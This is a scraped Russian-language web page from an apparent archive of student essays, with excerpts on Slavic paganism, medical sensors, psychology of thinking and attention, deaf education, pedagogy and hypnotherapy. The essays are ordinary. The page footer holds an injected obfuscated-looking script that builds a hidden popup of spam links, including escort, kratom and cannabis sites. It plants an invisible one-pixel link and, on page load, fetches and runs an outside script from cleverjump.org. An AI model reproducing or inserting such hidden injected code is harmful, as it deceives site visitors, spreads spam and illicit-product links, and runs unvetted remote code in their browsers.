Суббота, 20.07.2019
Опросник
Какие работы вы хотите скачивать?
Всего ответов: 4
Система учета

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Главная » 2011 » Ноябрь » 18
1 из 7

Религия славян

Языческая религия славян не является цельным, гармоничным образованием. Она распадается на пласты различной степени древности, которые причудливо переплетаются между собой. Древнейший пласт - культ Рожаниц, Матери и Дочери, родивших все живое на Земле. Кое-где их изображали в виде лосих (архаичные изображения такого рода до сих пор можно видеть в мотивах русской вышивки). Позднее к ним присоединился Род, олицетворявший населенную Вселенную. Род не является верховным божеством. Верховное божество правит миром, а Род есть мир.

Близ Киева стоит город Родень - крупнейший религиозный центр славян. Вплоть до крещения Руси туда не пускали иноземцев. Там совершается поклонение Роду, Триглаву и другим богам, приносятся жертвы, и Верховный волхв Роденя имеет в некотором смысле больше власти, чем любой из славянских князей.

Третий пласт - верховное божество. Оно у сла ... Читать дальше »

Просмотров: 124 | Добавил: petruha | Дата: 18.11.2011 | Комментарии (0)

1 из 14

Введение

Различные преобразователи неэлектрических величин в электрические прочно заняли свое место во многих областях человеческого знания, и уж тем более - в медицине. Трудно представить современного врача, занимающегося диагностикой различных заболеваний и их лечением, не опирающегося на огромное число достижений таких наук как радиоэлектроника, микроэлектроника, метрология, материаловедение. И хотя, датчики являются одной из самых медленно развивающихся областей медицинской электроники, да и всей электроники в целом, подавляющее большинство диагностических и терапевтических приборов и систем прямо или косвенно содержат множество самых разных преобразователей и электродов, без которых, подчас немыслима работа этой системы.

Некоторых типы датчиков будут рассмотрены в представленной работе. Определенная сложность заключается в огромнейшем разнообразии медицинских датчиков, а также в довольно м ... Читать дальше »

Просмотров: 116 | Добавил: petruha | Дата: 18.11.2011 | Комментарии (0)

1 из 9

Введение

  Среди всех познавательных процессов, представляющих собой формы отражения человеком окружающего мира, наивысшим и наиболее сложным является мышление. Если в процессе восприятия человек познает единичные и конкретные предметы, когда они непосредственно воздействуют на его органы чувств, то благода­ря мышлению он познает такие особенности, свойства и призна­ки предмета, которые он мог и не воспринимать непосредст­венно.

Особенностью мышления является отражение предметов и явлений действительности в их существенных признаках, зако­номерных связях и отношениях, которые существуют между частями, сторонами, признаками каждого предмета и между разными предметами и явлениями действительности.

Раскрыв связи, существующие между предметами, человек может заглянуть в глубь вещей и предвидеть их изменение под воздействием разных причин.

... Читать дальше »

Просмотров: 129 | Добавил: petruha | Дата: 18.11.2011 | Комментарии (1)

1 из 8

Введение

Трудно переоценить роль, которую играет в нашей жизни устная речь. Выступая в качестве наиболее употребительного способа общения, устное слово одновременно служит для нас носителем языка, важнейшим инструментом мышления.

Через всю историю сурдопедагогики красной нитью проходит стремление сформировать даже у полностью лишенного слуха ребенка «словесную речь не только в более доступном ему письменном или пальцевом виде, но непременно в виде устного слова».

Устная речь широко используется в общественно-трудовой жизни, в быту. Сфера ее применения непрерывно расширяется благодаря развитию таких современных средств связи, как телефон, радио и телевидение, позволяющих передавать устную речь на большие расстояния. Именно поэтому «в многогранном воспитательном процессе, осуществляемом  в специальных дошкольных учреждениях для детей с нарушением слуха ... Читать дальше »

Просмотров: 107 | Добавил: petruha | Дата: 18.11.2011 | Комментарии (0)

1 из 6

Введение

Передача опыта старшими поколениями людей младшим существует с древнейших времен. Накопление человечеством знаний, развитие орудий и способов труда, их усложнение исторически привели к необходимости специально заниматься обучением и воспитанием детей.

Каждое поколение людей решает три важнейшие задачи. Во-первых, освоить опыт предыдущих поколений, во-вторых, обогатить и приумножить этот опыт, и, в-третьих, - передать его следующему поколению. Общественный прогресс стал возможен лишь потому, что каждое новое поколение овладевало опытом предков, обогащало его и передавало своим потомкам. Такой широкий взгляд соответствует задачам педагогической науки. Но в обществе существуют различные социальные институты, которые реализуют задачи педагоги в различных возрастных группах населения. Один из таких социальных институтов - институт образования. В данной работе главной целью является изучение ... Читать дальше »

Просмотров: 121 | Добавил: petruha | Дата: 18.11.2011 | Комментарии (2)

1 из 7

1. Внимание, его физиологические механизмы и психологические функции. Виды внимания

           В процессе познания и деятельности человек получает массу впечатлении, причем многие раздражители действуют на мозг одновременно Сознание не может с одинаковой ясностью отразить все воспри­нимаемые и мыслимые объекты Биологически и социально важ­но для человека ясно отразить один два наиболее значимых раздражителя, действующих в данный момент на органы чувств. Во взаимодействии со

         Внимание - сосредоточение сознания на определенном объекте, обеспечивающее его особо ясное отражение.

   Среди психических явлений внимание занимает особое место оно не самостоятельный психический процесс и не относится »к свойствам личности В то же время внимание всегда включено в ... Читать дальше »

Просмотров: 128 | Добавил: petruha | Дата: 18.11.2011 | Комментарии (0)

1 из 8

Введение

Воспитание растущего человека как формирование развитой личности составляет одну из главных задач современного общества.

Преодоление отчуждения человека от его подлинной сущности, формирование духовно развитой личности в процессе исторического развития общества не совершается автоматически. Оно требует усилий со стороны людей, и эти усилия направляются как на создание материальных возможностей, объективных социальных условий, так и на реализацию открывающихся на каждом историческом этапе новых возможностей для духовно-нравственного совершенствования человека.

В этом двуедином процессе реальная возможность развития человека как личности обеспечивается всей совокупностью материальных и духовных ресурсов общества. Однако наличие объективных условий само по себе еще не решает задачу формирования развитой личности. Необходима организация систематического, базирующегося ... Читать дальше »

Просмотров: 113 | Добавил: petruha | Дата: 18.11.2011 | Комментарии (2)

1 из 6

Вопрос №1. Переведите на язык категорий законов диалектики проблему поощрения и наказания детей

Категории:

  • единство и борьба противоположностей;
  • количество и качество;
  • мера;
  • скачок;
  • отрицание отрицания.

Противоположности - те внутренние стороны, тенденции, силы предмета или явления, которые исключают, а вместе тем и предполагают друг друга. Отношение неразрывной взаимосвязи этих сторон составляет единство противоположностей. Взаимоисключающий характер противоположностей с необходимостью вызывает борьбу между ними. Таким образом, поощрение и наказание уже сами по себе являются иллюстрацией закона единства и борьбы противоположностей.


1 из 2

В процессе любой деятельности происходит всестороннее и целостное развитие личности ребенка, формируется его отношение к окружающему миру. Приходя в школу ребенок активно включается в учебную деятельность. Она начинает занимать в его жизни ведущее место. И чтобы учебная деятельность привела к формированию запроектированного образа личности, эту деятельность нужно организовать и разумно направить. «В этом самая большая сложность обучения», - как говорил Д. Б. Эльконин. «К сожалению, во многих случаях обучение не может предоставить возможностей для развития; ученики порой лишены самого необходимого - активного участи в познавательной деятельности, обречены на ее пассивное созерцание и затверживания готовых истин», - утверждает И. П. Подласый в своей книге «Педагогика начальной школы».

Активность в обучении позволяет школьнику быстрее и успешнее осваивать социальный опыт, развивает коммуникативные спо ... Читать дальше »

Просмотров: 109 | Добавил: petruha | Дата: 18.11.2011 | Комментарии (0)

1 из 9

Введение

За последние годы в биологии уделяется все больше внимания проблеме взаимосвязей между живым и неживым. Успешное развитие современных исследований на грани живого и неживого в области таких биологических дисциплин как молекулярная биология, генетика, физиология растений и животных, экология, биохимия, биофизика, бионика, космическая биология убедительно подтверждает необходимость всестороннего изучения в школе закономерностей процессов жизни. В связи с приближением содержания учебного курса биологии к современному уровню биологической науки в дидактике биологии также усиливается внимание к установлению последовательных связей между преподаванием биологии, химии, физики, астрономии и физической географии. Такие межпредметные связи целесообразны на всех этапах обучения биологии.

На первом этапе (в IV классе) при изучении курса природоведения следует уделить особое внимание элементарным зн ... Читать дальше »

Просмотров: 113 | Добавил: petruha | Дата: 18.11.2011 | Комментарии (0)

1 из 8

Прежде чем мы начнем понимать суть гипнотерапии, ее теоретическое основание, ее цели и практические способы достижения этих целей, нам следует уделить внимание природе гипноза как такового. Гипноз является не методом терапии, а психологическим феноменом, и поскольку это сложное и спорное явление, вокруг которого существует много непонимания и разногласий, необходимо посвятить целую главу попытке разъяснить его природу и многочисленные аспекты, как теоретические, так и практические.

В данной книге гипноз будет описываться с учетом потребностей и взглядов терапевта, а не теоретика или экспериментального психолога. Это означает различие в акцентах и, вероятно, более поверхностное внимание к таким вопросам, как определение, теория и научное доказательство. Если мы заняты проблемами тех, чьей целью является помощь людям в преодолении трудностей физического или психологического порядка, то нам уместно задаться вопросом: "Какой из взглядов ... Читать дальше »

Просмотров: 118 | Добавил: petruha | Дата: 18.11.2011 | Комментарии (0)

Поиск
Календарь
«  Ноябрь 2011  »
ПнВтСрЧтПтСбВс
 123456
78910111213
14151617181920
21222324252627
282930
Архив работ
Tuchka.At.Ua © 2019
(function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
list of cloud service providers in south africa<\/a> <\/div>
www.asg.co.za<\/span> <\/div> <\/div>
sydney vip escort<\/a> <\/div>
bestprivategirl.com<\/span> <\/div> <\/div> <\/div>
affordable dental bridges in atlanta<\/a> <\/div>
www.acefamilydental.com<\/span> <\/div> <\/div>
yakas\u0131 \u00e7\u0131t\u0131r escort<\/a> <\/div>
www.arzurproduction.com<\/span> <\/div> <\/div> <\/div>
house italian contemporary design<\/a> <\/div>
www.iqmatics.com<\/span> <\/div> <\/div>
ribs kuma\u015f<\/a> <\/div>
www.theumbrellahouse.com<\/span> <\/div> <\/div> <\/div>
\u0444\u043e\u043d\u0442\u0430\u043d\u044b \u0434\u043b\u044f \u0434\u043e\u043c\u0430 \u0438 \u043e\u0444\u0438\u0441\u0430<\/a> <\/div>
decorplaza.com.ua<\/span> <\/div> <\/div>
g\u00fcnstige poloshirts f\u00fcr herren<\/a> <\/div>
www.denim-culture.com<\/span> <\/div> <\/div> <\/div>
pretty love<\/a> <\/div>
www.blueshop.co.il<\/span> <\/div> <\/div>
\u0634\u0642\u0642 \u0627\u0633\u0637\u0646\u0628\u0648\u0644 \u062a\u0642\u0633\u064a\u0645<\/a> <\/div>
www.tour4arabs.com<\/span> <\/div> <\/div> <\/div>
java programming for beginners online<\/a> <\/div>
pcworkshopslondon.co.uk<\/span> <\/div> <\/div>
kratom borneo red vein<\/a> <\/div>
www.authentickratom.com<\/span> <\/div> <\/div> <\/div>
cherry pie kush<\/a> <\/div>
www.durgstoresonline.com<\/span> <\/div> <\/div>
listerine logo<\/a> <\/div>
www.christiania-tannlegesenter.no<\/span> <\/div> <\/div> <\/div>
\u0447\u0435\u043c\u043e\u0434\u0430\u043d \u0434\u043b\u044f \u0432\u0438\u0437\u0430\u0436\u0438\u0441\u0442\u0430 \u043d\u0430 \u043a\u043e\u043b\u0435\u0441\u0438\u043a\u0430\u0445<\/a> <\/div>
promakeupstore.com.ua<\/span> <\/div> <\/div>
\u043f\u043e\u044f\u0441 \u043c\u043e\u043d\u0442\u0430\u0436\u043d\u044b\u0439 \u0441 \u0446\u0435\u043f\u044c\u044e \u0442\u0438\u043f \u0430<\/a> <\/div>
vinkel.com.ua<\/span> <\/div> <\/div> <\/div>
wooden toys sydney<\/a> <\/div>
purpleturtletoys.com.au<\/span> <\/div> <\/div>
hotel diva \u043c\u0430\u043b\u044c\u0434\u0438\u0432\u044b<\/a> <\/div>
platinumtravel.com.ua<\/span> <\/div> <\/div> <\/div>
\u0434\u0430\u043d\u0430 \u043c\u0435\u0431\u0435\u043b\u044c \u043a\u043e\u043c\u043e\u0434\u044b<\/a> <\/div>
divanetto.com.ua<\/span> <\/div> <\/div>
vakkundigheid ontwikkelen fotografie<\/a> <\/div>
www.foto-cursussen.com<\/span> <\/div> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div>
\u0448\u043a\u043e\u043b\u0430 \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u043f\u043e\u0437\u043d\u044f\u043a\u0438<\/a> <\/div>
oxford-school.com.ua<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} })();